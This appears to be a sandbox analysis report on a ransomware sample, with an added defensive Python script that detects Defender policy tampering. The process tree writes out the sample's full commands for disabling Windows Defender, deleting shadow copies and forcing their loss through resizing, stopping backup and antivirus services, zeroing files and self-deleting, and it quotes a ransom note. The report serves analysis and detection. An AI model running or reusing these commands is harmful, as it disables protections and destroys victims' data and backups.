Analysis

max time kernel: 142s
max time network: 149s
platform: windows10-1703_x64
resource: win10-20240221-en
resource tags: arch:x64, arch:x86, image:win10-20240221-en, locale:en-us, os:windows10-1703-x64, system
submitted: 27-02-2024 00:12
Behavioral tasks (all run on resource win10-20240221-en)

behavioral1: 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
behavioral2: 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
behavioral3: ae66e009e16f0fad3b70ad20801f48f2edb904fa5341a89e126a26fd3fc80f75.exe
behavioral4: c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

The General, Signatures and Processes sections below are for behavioral1.
General

Target: 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Size: 82KB
MD5: e01e11dca5e8b08fc8231b1cb6e2048c
SHA1: 4983d07f004436caa3f10b38adacbba6a4ede01a
SHA256: 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f
SHA512: 298bfb9fe55ddd80f1c6671622d7e9e865899a855b5bb8e0d85d8520160cedca6fd8bc72c9881925477bcab883bf6e6f4c69f997b774b74fe992e023a81269de
SSDEEP: 1536:PcW4lAJGGnzjoih/NDh/NDuk+XkGAK/hztXcag+PlbBfkWIyvZrw281r5XsmCZEe:UWNGszjoih/NDh/NDuk+XkGAK/hztXcQ
Malware Config

Signatures
Contains code to disable Windows Defender (1 IoC)
A .NET executable tasked with disabling Windows Defender capabilities such as real-time monitoring, blocking at first seen, etc.
yara rule disable_win_def matched in behavioral1/memory/3696-0-0x0000000000DB0000-0x0000000000DCA000-memory.dmp (a memory dump of PID 3696, the sample itself).

Modifies Windows Defender Real-time Protection settings (3 IoCs)
Registry values written by 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe under \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection:
- DisableBehaviorMonitoring = 1 (int)
- DisableOnAccessProtection = 1 (int)
- DisableScanOnRealtimeEnable = 1 (int)
These live under the Group Policy hive, so they take precedence over whatever Set-MpPreference or the Security Center UI reports as the local preference. The sandbox image is Windows 10 1703, which predates Tamper Protection (introduced in 1903), so an administrator-level process can write them unopposed.
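As an added example (not part of this sandbox report and not code from the sample), the Python below parses the text that `reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /s` prints and reports which protections the policy values switch off. This is how you would check a suspect host for the same tamper the sample performed. The column layout it assumes is the one reg query emits (key path on its own line, then indented "name  REG_TYPE  data" lines); the sample dump is constructed to mirror the three values above, and the table mapping value names to protections is the script's own assumption about which Disable* kill switches matter.

```python
"""Audit Windows Defender policy tamper from `reg query` text output.

Added example for this report, not code from the sample or the sandbox.
It assumes the column layout that `reg query <key> /s` prints: a key path
on its own line, then one indented line per value of the form
    <name>    <REG_TYPE>    <data>
"""
import re
from typing import Dict, List, Tuple

DEFENDER_POLICY_ROOT = r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender"

# (subkey relative to the root, value name) -> protection that a value of 1 turns off.
# The three Real-Time Protection names are the ones this sample wrote; the rest
# are the other policy kill switches an auditor would also want flagged (assumed list).
POLICY_KILL_SWITCHES = {
    ("", "DisableAntiSpyware"): "Defender AV engine",
    ("Real-Time Protection", "DisableRealtimeMonitoring"): "real-time monitoring",
    ("Real-Time Protection", "DisableBehaviorMonitoring"): "behaviour monitoring",
    ("Real-Time Protection", "DisableOnAccessProtection"): "on-access file scanning",
    ("Real-Time Protection", "DisableScanOnRealtimeEnable"): "scan on re-enabling real-time protection",
    ("Real-Time Protection", "DisableIOAVProtection"): "scanning of downloaded files and attachments (IOAV)",
    ("Real-Time Protection", "DisableScriptScanning"): "script scanning",
}
# Registry names are case-insensitive, so index the table in lower case.
_SWITCH_INDEX = {(k.lower(), v.lower()): label for (k, v), label in POLICY_KILL_SWITCHES.items()}

# Matches a value line such as "    DisableBehaviorMonitoring    REG_DWORD    0x1"
_VALUE_LINE = re.compile(r"^\s+(\S.*?)\s{2,}(REG_[A-Z_]+)\s{2,}(.*)$")


def parse_reg_query(text: str) -> Dict[str, Dict[str, Tuple[str, str]]]:
    """Parse `reg query ... /s` output into {key_path: {value_name: (type, data)}}."""
    keys: Dict[str, Dict[str, Tuple[str, str]]] = {}
    current = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():          # an un-indented line is a key path
            current = line.strip()
            keys.setdefault(current, {})
            continue
        m = _VALUE_LINE.match(line)
        if m and current is not None:
            name, vtype, data = m.groups()
            keys[current][name] = (vtype, data.strip())
    return keys


def disabled_protections(reg_dump: str) -> List[str]:
    """Names of protections that the dumped policy values switch off (DWORD == 1)."""
    root = DEFENDER_POLICY_ROOT.lower()
    found: List[str] = []
    for key_path, values in parse_reg_query(reg_dump).items():
        if not key_path.lower().startswith(root):
            continue
        subkey = key_path[len(DEFENDER_POLICY_ROOT):].lstrip("\\").lower()
        for name, (vtype, data) in values.items():
            label = _SWITCH_INDEX.get((subkey, name.lower()))
            if label and vtype == "REG_DWORD" and int(data, 16) == 1:
                found.append(label)
    return found


# Constructed dump mirroring the three values this sample set, plus one
# untouched value to show that only data == 1 is reported.
SAMPLE_DUMP = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
    DisableAntiSpyware    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
    DisableBehaviorMonitoring    REG_DWORD    0x1
    DisableOnAccessProtection    REG_DWORD    0x1
    DisableScanOnRealtimeEnable    REG_DWORD    0x1
"""

if __name__ == "__main__":
    for protection in disabled_protections(SAMPLE_DUMP):
        print("policy-disabled:", protection)
```

Run it against a real dump with `reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /s > dump.txt` and feed the file contents to disabled_protections(). An empty result only means no policy kill switch is set; the Set-MpPreference changes listed in the process tree below are local preferences and must be checked separately with Get-MpPreference.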
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Blocklisted process makes network request (4 IoCs)
mshta.exe (PID 5272) made network requests in flows 13, 16, 18 and 19.

Downloads MZ/PE file
Drops startup file (1 IoC)
File created by 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
Flows 2, 3 and 11 contacted raw.githubusercontent.com.
Modifies WinLogon (2 TTPs, 2 IoCs)
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe set two string values under \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon. These are the legal-notice strings Windows displays before the logon screen, so the ransom note is shown to anyone who signs in:
- LegalNoticeCaption = "Information..."
- LegalNoticeText (line breaks stored as \r\n in the value):
    Your Files are Encrypted.

    Don’t worry, you can return all your files!

    You've got 48 hours(2 Days), before you lost your files forever.
    I will treat you good if you treat me good too.

    The Price to get all things to the normal : 20,000$
    My BTC Wallet ID :
    1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9

    Contact :
    [email protected]
Launches sc.exe (4 IoCs)
sc.exe is the Windows utility for controlling services on the system.
sc.exe PIDs: 3640, 1012, 3484, 4676
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Checks processor information in registry (2 TTPs, 5 IoCs)
Processor information is often read in order to detect sandboxing environments. All five reads here come from firefox.exe, not from the sample itself:
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
- Key values queried under that key: VendorIdentifier, Update Signature, Update Revision, ~Mhz
Interacts with shadow copies (2 TTPs, 14 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery. The process tree below shows the full pattern: a "vssadmin Delete Shadows /all /quiet", then for each drive letter H: down to C: a "resize shadowstorage /maxsize=unbounded" followed by "/maxsize=401MB", then a second "Delete Shadows". Shrinking the shadow storage below what the existing snapshots occupy forces VSS to discard them, so the resize sequence removes restore points even where the explicit delete is refused.
vssadmin.exe PIDs: 792, 2572, 796, 5112, 1908, 2524, 2932, 3792, 3680, 2536, 3596, 3388, 2372, 3624
Kills process with taskkill (3 IoCs)
taskkill.exe PIDs: 3044, 5068, 2328
Modifies registry class (2 IoCs)
Key created: \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings, once by OpenWith.exe and once by firefox.exe
Runs net.exe

Runs ping.exe (1 TTP, 1 IoC)
PING.EXE PID: 6332
Suspicious behavior: EnumeratesProcesses (64 IoCs)
62 events from 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe (PID 3696) and 2 from powershell.exe (PID 4432).
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Token privileges enabled, grouped by process (the report lists at most 64 entries per signature, and this list is cut off at that limit):
- 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe (PID 3696): SeDebugPrivilege
- powershell.exe (PID 4432) and powershell.exe (PID 1392): SeDebugPrivilege, then SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege and the numeric privilege LUIDs 33, 34, 35, 36 (left unresolved by the sandbox)
- powershell.exe (PID 4036): SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege (list truncated here)
- powershell.exe (PIDs 3520, 4772, 1984, 3504, 2828, 3844, 1404, 1208, 4776, 560): SeDebugPrivilege
- taskkill.exe (PIDs 2328, 3044, 5068): SeDebugPrivilege
Suspicious use of FindShellTrayWindow (7 IoCs)
3 events from 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe (PID 3696), 4 from firefox.exe (PID 5264)

Suspicious use of SendNotifyMessage (6 IoCs)
3 events from 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe (PID 3696), 3 from firefox.exe (PID 5264)

Suspicious use of SetWindowsHookEx (2 IoCs)
OpenWith.exe (PID 3992), firefox.exe (PID 5264)
Suspicious use of WriteProcessMemory (64 IoCs)
All 64 events are PID 3696 (58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe) writing into the memory of a process it has just created; each target is recorded twice. Every target PID is one of its own children in the process tree below (the PowerShell, net.exe and related helpers), so this is the parent's write into a freshly spawned child rather than injection into an unrelated process. Target PIDs, with the report's process index in parentheses:
4432 (74), 1392 (77), 3520 (79), 4036 (81), 1984 (83), 3504 (86), 4772 (88), 2828 (89), 3844 (91), 1404 (93), 1208 (95), 4776 (97), 4212 (138), 2668 (139), 2176 (140), 1408 (141), 1484 (142), 2312 (143), 2836 (144), 200 (145), 208 (146), 4056 (147), 4148 (148), 4272 (200), 4152 (201), 4156 (202), 2180 (203), 528 (204), 516 (205), 312 (206), 4448 (207), 560 (209)
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes
C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe"C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3696 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:3844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
PID:1404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
PID:1208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4776
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵PID:3928
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2572
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:3596
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:796
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:5112
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:792
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:1908
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:3680
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:3388
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:2524
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:2372
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:2932
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:3792
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:3624
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2536
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3044
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5068
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2328
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
- Launches sc.exe
PID:3484
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
- Launches sc.exe
PID:4676
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
- Launches sc.exe
PID:3640
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
- Launches sc.exe
PID:1012
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophos /y2⤵PID:1548
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵PID:6632
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:428
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵PID:6400
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:3620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵PID:6852
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵PID:2580
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:6744
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:4616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:6600
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:4284
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:6420
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:3652
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:6552
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:3272
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:6892
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:4604
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵PID:6736
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:3080
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:6712
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:3344
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:6828
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:4788
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:6648
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵PID:2592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:6772
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop veeam /y2⤵PID:916
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵PID:6900
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:6472
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:1524
-
    C:\Windows\system32\net1.exe (PID 6568): C:\Windows\system32\net1 stop VeeamDeploymentService /y
  C:\Windows\SYSTEM32\net.exe (PID 3672): "net.exe" stop VeeamTransportSvc /y
    C:\Windows\system32\net1.exe (PID 6796): C:\Windows\system32\net1 stop VeeamTransportSvc /y
  C:\Windows\SYSTEM32\net.exe (PID 4212): "net.exe" stop VSNAPVSS /y
    C:\Windows\system32\net1.exe (PID 6480): C:\Windows\system32\net1 stop VSNAPVSS /y
  C:\Windows\SYSTEM32\net.exe (PID 2668): "net.exe" stop stc_raw_agent /y
    C:\Windows\system32\net1.exe (PID 6788): C:\Windows\system32\net1 stop stc_raw_agent /y
  C:\Windows\SYSTEM32\net.exe (PID 2176): "net.exe" stop zhudongfangyu /y
    C:\Windows\system32\net1.exe (PID 6456): C:\Windows\system32\net1 stop zhudongfangyu /y
  C:\Windows\SYSTEM32\net.exe (PID 1408): "net.exe" stop YooIT /y
    C:\Windows\system32\net1.exe (PID 6488): C:\Windows\system32\net1 stop YooIT /y
  C:\Windows\SYSTEM32\net.exe (PID 1484): "net.exe" stop YooBackup /y
    C:\Windows\system32\net1.exe (PID 6448): C:\Windows\system32\net1 stop YooBackup /y
  C:\Windows\SYSTEM32\net.exe (PID 2312): "net.exe" stop QBCFMonitorService /y
    C:\Windows\system32\net1.exe (PID 6624): C:\Windows\system32\net1 stop QBCFMonitorService /y
  C:\Windows\SYSTEM32\net.exe (PID 2836): "net.exe" stop Intuit.QuickBooks.FCS /y
    C:\Windows\system32\net1.exe (PID 6616): C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
  C:\Windows\SYSTEM32\net.exe (PID 200): "net.exe" stop QBIDPService /y
    C:\Windows\system32\net1.exe (PID 6820): C:\Windows\system32\net1 stop QBIDPService /y
  C:\Windows\SYSTEM32\net.exe (PID 208): "net.exe" stop QBFCService /y
    C:\Windows\system32\net1.exe (PID 6464): C:\Windows\system32\net1 stop QBFCService /y
  C:\Windows\SYSTEM32\net.exe (PID 4056): "net.exe" stop RTVscan /y
    C:\Windows\system32\net1.exe (PID 6560): C:\Windows\system32\net1 stop RTVscan /y
  C:\Windows\SYSTEM32\net.exe (PID 4148): "net.exe" stop SavRoam /y
    C:\Windows\system32\net1.exe (PID 6412): C:\Windows\system32\net1 stop SavRoam /y
  C:\Windows\SYSTEM32\net.exe (PID 4272): "net.exe" stop ccSetMgr /y
    C:\Windows\system32\net1.exe (PID 6428): C:\Windows\system32\net1 stop ccSetMgr /y
  C:\Windows\SYSTEM32\net.exe (PID 4152): "net.exe" stop ccEvtMgr /y
    C:\Windows\system32\net1.exe (PID 6640): C:\Windows\system32\net1 stop ccEvtMgr /y
  C:\Windows\SYSTEM32\net.exe (PID 4156): "net.exe" stop DefWatch /y
    C:\Windows\system32\net1.exe (PID 6440): C:\Windows\system32\net1 stop DefWatch /y
  C:\Windows\SYSTEM32\net.exe (PID 2180): "net.exe" stop NetBackup BMR MTFTP Service /y
    C:\Windows\system32\net1.exe (PID 6608): C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
  C:\Windows\SYSTEM32\net.exe (PID 528): "net.exe" stop BMR Boot Service /y
    C:\Windows\system32\net1.exe (PID 6884): C:\Windows\system32\net1 stop BMR Boot Service /y
  C:\Windows\SYSTEM32\net.exe (PID 516): "net.exe" stop mfewc /y
    C:\Windows\system32\net1.exe (PID 6576): C:\Windows\system32\net1 stop mfewc /y
  C:\Windows\SYSTEM32\net.exe (PID 312): "net.exe" stop McAfeeDLPAgentService /y
    C:\Windows\system32\net1.exe (PID 6752): C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
  C:\Windows\SYSTEM32\net.exe (PID 4448): "net.exe" stop avpsus /y
    C:\Windows\system32\net1.exe (PID 6660): C:\Windows\system32\net1 stop avpsus /y
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 560): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\mshta.exe (PID 5272): "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
    - Blocklisted process makes network request
  C:\Windows\SYSTEM32\cmd.exe (PID 6060): "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
    C:\Windows\system32\PING.EXE (PID 6332): ping 127.0.0.7 -n 3
      - Runs ping.exe
    C:\Windows\system32\fsutil.exe (PID 5740): fsutil file setZeroData offset=0 length=524288 “%s”
  C:\Windows\System32\cmd.exe (PID 5336): "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
    C:\Windows\system32\choice.exe (PID 7084): choice /C Y /N /D Y /T 3
C:\Windows\system32\DllHost.exe (PID 6576): C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\werfault.exe (PID 2524): werfault.exe /h /shared Global\fb74db93748046b4857c2dd9b94a4534 /t 6252 /p 5272
C:\Windows\system32\OpenWith.exe (PID 3992): C:\Windows\system32\OpenWith.exe -Embedding
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
C:\Windows\System32\SystemSettingsBroker.exe (PID 5828): C:\Windows\System32\SystemSettingsBroker.exe -Embedding
\??\c:\windows\system32\svchost.exe (PID 7032): c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s RmSvc
C:\Program Files\Mozilla Firefox\firefox.exe (PID 7056): "C:\Program Files\Mozilla Firefox\firefox.exe"
  C:\Program Files\Mozilla Firefox\firefox.exe (PID 5264): "C:\Program Files\Mozilla Firefox\firefox.exe"
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    C:\Program Files\Mozilla Firefox\firefox.exe (PID 3980): "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5264.0.588753837\866359806" -parentBuildID 20221007134813 -prefsHandle 1716 -prefMapHandle 1708 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {48990510-dd44-485f-b8f0-0fdbbafb25b2} 5264 "\\.\pipe\gecko-crash-server-pipe.5264" 1796 1abffe06458 gpu
    C:\Program Files\Mozilla Firefox\firefox.exe (PID 4440): "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5264.1.1633732140\70754201" -parentBuildID 20221007134813 -prefsHandle 2124 -prefMapHandle 2120 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {feca39cc-ecad-4c57-a713-233e33ac1d92} 5264 "\\.\pipe\gecko-crash-server-pipe.5264" 2152 1abff3fd058 socket
    C:\Program Files\Mozilla Firefox\firefox.exe (PID 6412): "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5264.2.1175030070\1631846027" -childID 1 -isForBrowser -prefsHandle 3040 -prefMapHandle 3036 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {251dbc4f-69f2-4ef1-b8e0-4109f7380b6f} 5264 "\\.\pipe\gecko-crash-server-pipe.5264" 3052 1abff45b858 tab
